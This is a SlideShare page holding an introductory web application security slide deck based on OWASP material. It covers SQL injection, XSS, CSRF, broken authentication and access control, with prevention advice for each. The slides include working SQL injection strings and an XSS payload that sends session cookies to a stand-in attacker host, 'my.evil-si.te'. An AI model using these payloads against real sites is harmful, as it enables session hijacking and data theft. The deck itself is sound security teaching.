Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
WEB APPLICATION 
SECURITY 
IN A NUTSHELL 
AN ULTRA-COMPACT INTRO (OR REFRESHER) TO WEB APPLICATION SECURITY 
Created by Bj...
BJÖRN KIMMINICH 
Application Security Officer at 
Author of open-source pentest training webapp 
Kuehne + Nagel (AG & Co.)...
FAMOUS LAST WORDS... 
“Nobody would bother to hack us.” 
“Our Firewall, IDS and IPS will keep us safe.” 
“We will add secu...
INJECTION
INJECTION MEANS... 
...tricking an application into including unintended commands in 
the data sent to an interpreter.
INTERPRETER MEANS... 
...a program that takes a String and interprets it as a command.
INTERPRETERS ARE USED FOR... 
SQL 
HQL 
OS Shell 
LDAP 
XPath 
...
BYPASSING AUTHENTICATION 
WITH SQL INJECTION 
String query = "SELECT id FROM users " + 
"WHERE name = '" + req.getParamete...
ATTACK EXAMPLES 
ON AUTHENTICATION QUERIES 
Disabling password check for a known username: 
SELECT id FROM users WHERE nam...
SPYING OUT DATA 
WITH SQL INJECTION 
String query = 
"SELECT id,author,title,price FROM books " + 
"WHERE title LIKE '%" +...
ATTACK EXAMPLES 
ON DATA RETRIEVAL QUERIES 
Probing for right number of result set columns: 
SELECT [...] WHERE title LIKE...
PREVENTING INJECTION 
Avoid Interpreters 
Bind Variables 
Prepared Statements 
Least Privileges for app DB user 
White Lis...
CROSS SITE SCRIPTING (XSS)
MALICIOUS CODE IS SENT... 
...to an innocent user's browser through 
a form field or URL (Reflected XSS) 
a previously sto...
POSSIBLE DAMAGE FROM XSS 
stolen user session 
stolen sensitive data 
rewriting web page 
redirecting to malicious site
XSS VULNERABILITY EXAMPLE 
http://bookwo.rm/titles/search?keywords=raspberry%20pi 
The indented use case is to display the...
XSS ATTACK EXAMPLES 
Probing for XSS Vulnerability 
<script>alert(1)</script> 
Stealing User Session 
<script> 
</script> ...
PREVENTING XSS 
Do not unnecessarily include user supplied input into output 
Output encode all user supplied input 
Sanit...
CROSS SITE REQUEST FORGERY (CSRF)
A VICTIM'S BROWSER... 
...is tricked into issuing a command to a vulnerable webapp. This 
is caused by browsers automatica...
CSRF ATTACK EXAMPLES
PREVENTING CSRF 
Add a secret token to all sensitive requests 
This token must not be automatically submitted 
Require sec...
BROKEN AUTHENTICATION
TYPICAL AUTHENTICATION FLAWS 
Allowing weak passwords 
Storing SSL certificate insecurely 
Credentials passed via insecure...
SIDE CHANNEL ATTACK VECTORS 
Change Password 
“Remember me” 
Forgot Password 
Secret Questions 
Make sure your application...
CLASSICAL BROKEN AUTHENTICATION... 
...DUE TO STARTING LOGIN PROCESS ON UNENCRYPTED PAGE 
http://sick‐cure‐ba.nk/login.do ...
WEAK HASHES PUT PASSWORDS AT RISK... 
...AS DO UNSALTED STRONG HASH ALGORITHMS 
id username password 
1 admin d033e22ae348...
BROKEN ACCESS CONTROL
COMMON AUTHORIZATION MISTAKES 
Hiding object references instead of restricting access 
Displaying only authorized links an...
REQUEST TAMPERING FOR PRIVILEGE ESCALATION... 
...AND FINDING ALL KINDS OF ACCESS CONTROL ISSUES 
http://logistics‐worldwi...
SECURING AUTHORIZATION 
Never rely on “Security by obscurity” 
Replace direct object references with temporary mappings 
R...
BROKEN ENVIRONMENT
POSSIBLE ENVIRONMENTAL VULNERABILITIES 
Software Libraries 
Application Server 
Web Server 
Operating System 
...
KNOWN VULNERABILITY EXAMPLES 
Component Vulnerability Affected 
OpenSSL Obtain sensitive information from process memory v...
PROTECTION FROM ENVIRONMENTAL VULNERABILITIES 
Monitor security of used components 
Keep up with patches for used componen...
Q&A
CREDITS 
Presentation created with reveal.js 
The HTML Presentation Framework 
Based on free material provided by OWASP 
T...
THE END 
BY BJÖRN KIMMINICH / KIMMINICH.DE 
These slides are publicly available on GitHub and Slideshare.
Upcoming SlideShare
Loading in …5
×

Web Application Security in a nutshell

8,181 views

Published on

>>> View this presentation online at http://webappsec-nutshell.kimminich.de/ <<<

An ultra-compact intro (or refresher) to Web Application Security derived from my Web Application Security Training Workshop (http://de.slideshare.net/BjrnKimminich/web-application-security-21684264).

Published in: Technology

Web Application Security in a nutshell

  1. 1. WEB APPLICATION SECURITY IN A NUTSHELL AN ULTRA-COMPACT INTRO (OR REFRESHER) TO WEB APPLICATION SECURITY Created by Björn Kimminich / @bkimminich
  2. 2. BJÖRN KIMMINICH Application Security Officer at Author of open-source pentest training webapp Kuehne + Nagel (AG & Co.) KG juice-shop OWASP OWASP Zed Attack Proxy member and contributor
  3. 3. FAMOUS LAST WORDS... “Nobody would bother to hack us.” “Our Firewall, IDS and IPS will keep us safe.” “We will add security to the system later.” “What's the worst that could actually happen?”
  4. 4. INJECTION
  5. 5. INJECTION MEANS... ...tricking an application into including unintended commands in the data sent to an interpreter.
  6. 6. INTERPRETER MEANS... ...a program that takes a String and interprets it as a command.
  7. 7. INTERPRETERS ARE USED FOR... SQL HQL OS Shell LDAP XPath ...
  8. 8. BYPASSING AUTHENTICATION WITH SQL INJECTION String query = "SELECT id FROM users " + "WHERE name = '" + req.getParameter("username") + "'" + "AND password = '" + req.getParameter("password") + "'"; The indented use case results in a query like this: SELECT id FROM users WHERE name = 'bjoern' AND password = 'secret'
  9. 9. ATTACK EXAMPLES ON AUTHENTICATION QUERIES Disabling password check for a known username: SELECT id FROM users WHERE name = 'bjoern'‐‐' AND password = '?' Logging in without even knowing a username: SELECT id FROM users WHERE name = '' or 1=1‐‐' AND password = '?'
  10. 10. SPYING OUT DATA WITH SQL INJECTION String query = "SELECT id,author,title,price FROM books " + "WHERE title LIKE '%" + req.getParameter("query") + "%'"; The indented use case results in a query like this: SELECT id,author,title,price FROM books WHERE title LIKE '%tangled web%'
  11. 11. ATTACK EXAMPLES ON DATA RETRIEVAL QUERIES Probing for right number of result set columns: SELECT [...] WHERE title LIKE '%' UNION SELECT null FROM users‐‐%' SELECT [...] WHERE title LIKE '%' UNION SELECT null,null FROM users‐‐%' SELECT [...] WHERE title LIKE '%' UNION SELECT null,null,null FROM users‐‐%' Using known column names to extract data: SELECT [...] WHERE title LIKE '%' UNION SELECT name,password,email FROM users‐‐%'
  12. 12. PREVENTING INJECTION Avoid Interpreters Bind Variables Prepared Statements Least Privileges for app DB user White List Input Validation
  13. 13. CROSS SITE SCRIPTING (XSS)
  14. 14. MALICIOUS CODE IS SENT... ...to an innocent user's browser through a form field or URL (Reflected XSS) a previously stored DB record (Persistent XSS) a DOM element of a rich JS client (Local XSS)
  15. 15. POSSIBLE DAMAGE FROM XSS stolen user session stolen sensitive data rewriting web page redirecting to malicious site
  16. 16. XSS VULNERABILITY EXAMPLE http://bookwo.rm/titles/search?keywords=raspberry%20pi The indented use case is to display the keywords above the results: <% String keywords = request.getParameter("keywords"); List<Book> results = titleSearchService.findByKeywords(keywords.split(" ")); %> There are <%=results.count()%> results for your search by <em><%=keywords%></em> <table> <% for (Book book : results) { %> // render result as table rows <% } %> </table>
  17. 17. XSS ATTACK EXAMPLES Probing for XSS Vulnerability <script>alert(1)</script> Stealing User Session <script> </script> new Image().src="http://my.evil‐si.te/hijack.php?c="+encodeURI(document.cookie); Site Defacement <script>document.body.background="http://my.evil‐si.te/image.jpg";</script>
  18. 18. PREVENTING XSS Do not unnecessarily include user supplied input into output Output encode all user supplied input Sanitize HTML where user supplied HTML is unavoidable White List Input Validation
  19. 19. CROSS SITE REQUEST FORGERY (CSRF)
  20. 20. A VICTIM'S BROWSER... ...is tricked into issuing a command to a vulnerable webapp. This is caused by browsers automatically including user authentication data with each request. Session Cookie Basic Authentication Authorization HTTP Header ...
  21. 21. CSRF ATTACK EXAMPLES
  22. 22. PREVENTING CSRF Add a secret token to all sensitive requests This token must not be automatically submitted Require secondary authentication for sensitive functions Beware exposing the token in a Referer HTTP header Make sure your application has no XSS holes that could be exploited to attack others!
  23. 23. BROKEN AUTHENTICATION
  24. 24. TYPICAL AUTHENTICATION FLAWS Allowing weak passwords Storing SSL certificate insecurely Credentials passed via insecure http connection Expose session id's in URLs, via unencrypted network, logs, ...
  25. 25. SIDE CHANNEL ATTACK VECTORS Change Password “Remember me” Forgot Password Secret Questions Make sure your application does not store credentials in its database unencrypted!
  26. 26. CLASSICAL BROKEN AUTHENTICATION... ...DUE TO STARTING LOGIN PROCESS ON UNENCRYPTED PAGE http://sick‐cure‐ba.nk/login.do POST /login.do HTTP/1.1 Host: sick‐cure‐ba.nk Cache‐Control: no‐cache Content‐Type: application/x‐www‐form‐urlencoded username=bjoern&password=secret
  27. 27. WEAK HASHES PUT PASSWORDS AT RISK... ...AS DO UNSALTED STRONG HASH ALGORITHMS id username password 1 admin d033e22ae348aeb5660fc2140aec35850c4da997 2 bjoern 2bb80d537b1da3e38bd30361aa855686bde0eacd7162fef6a25fe97bf527a25b 3 localhorst 0f59bd4122f0c02002ec578e4eec306ed48ff2ad0105a307a6dc98c0e9a54fe4 64e5f807236edce12134067a0b6690891e82490b2b9fa7b4171db43ee8cb4006 Cracking unsalted hashes with a Rainbow Table attack is fast, even though the last two of them might seem sufficiently secure given their 256 and 512bit length. You can even crack password hashes online, e.g. at or via . CrackStation a tweet to @PlzCrack
  28. 28. BROKEN ACCESS CONTROL
  29. 29. COMMON AUTHORIZATION MISTAKES Hiding object references instead of restricting access Displaying only authorized links and menu choices Trusting client-side access control mechanisms Lack of server-side verification of user privileges
  30. 30. REQUEST TAMPERING FOR PRIVILEGE ESCALATION... ...AND FINDING ALL KINDS OF ACCESS CONTROL ISSUES http://logistics‐worldwi.de/showShipment?id=40643108 http://my‐universi.ty/api/students/6503/exams/view http://document‐warehou.se/landingpage?content=index.html
  31. 31. SECURING AUTHORIZATION Never rely on “Security by obscurity” Replace direct object references with temporary mappings Restrict data and functionality access to authorized users Enforce user or role based permissions
  32. 32. BROKEN ENVIRONMENT
  33. 33. POSSIBLE ENVIRONMENTAL VULNERABILITIES Software Libraries Application Server Web Server Operating System ...
  34. 34. KNOWN VULNERABILITY EXAMPLES Component Vulnerability Affected OpenSSL Obtain sensitive information from process memory via crafted packets that trigger a buffer over-read ( ) 1.0.1 - 1.0.1f, 1.0.2- beta, 1.0.2-beta1 Unix Bash Execution of arbitrary commands on vulnerable Bash, potentially compromising the entire system ( ) CGI, OpenSSH, DHCP, QMail, ... Struts Remote manipulation of the ClassLoader via the class parameter, which is passed to the getClass() method before 2.3.16.1 Struts Wildcard cookiesName not properly restricts access to the getClass() method, which allows ClassLoader manipulation before 2.3.16.2 Heartbleed Shellshock
  35. 35. PROTECTION FROM ENVIRONMENTAL VULNERABILITIES Monitor security of used components Keep up with patches for used components Remove unnecessary stuff on all levels Restrict use of unapproved components Java and .NET project dependencies can be monitored by which relies on the OWASP Dependency Check NIST . For Javascript and Node.js modules there is which is updated manually National Vulnerability Database Retire.js via its GitHub project . Both tools integrate well with typical software build processes.
  36. 36. Q&A
  37. 37. CREDITS Presentation created with reveal.js The HTML Presentation Framework Based on free material provided by OWASP The Open Web Application Security Project Background image based on Digital Shodan by sephiroth-kmfdm
  38. 38. THE END BY BJÖRN KIMMINICH / KIMMINICH.DE These slides are publicly available on GitHub and Slideshare.

×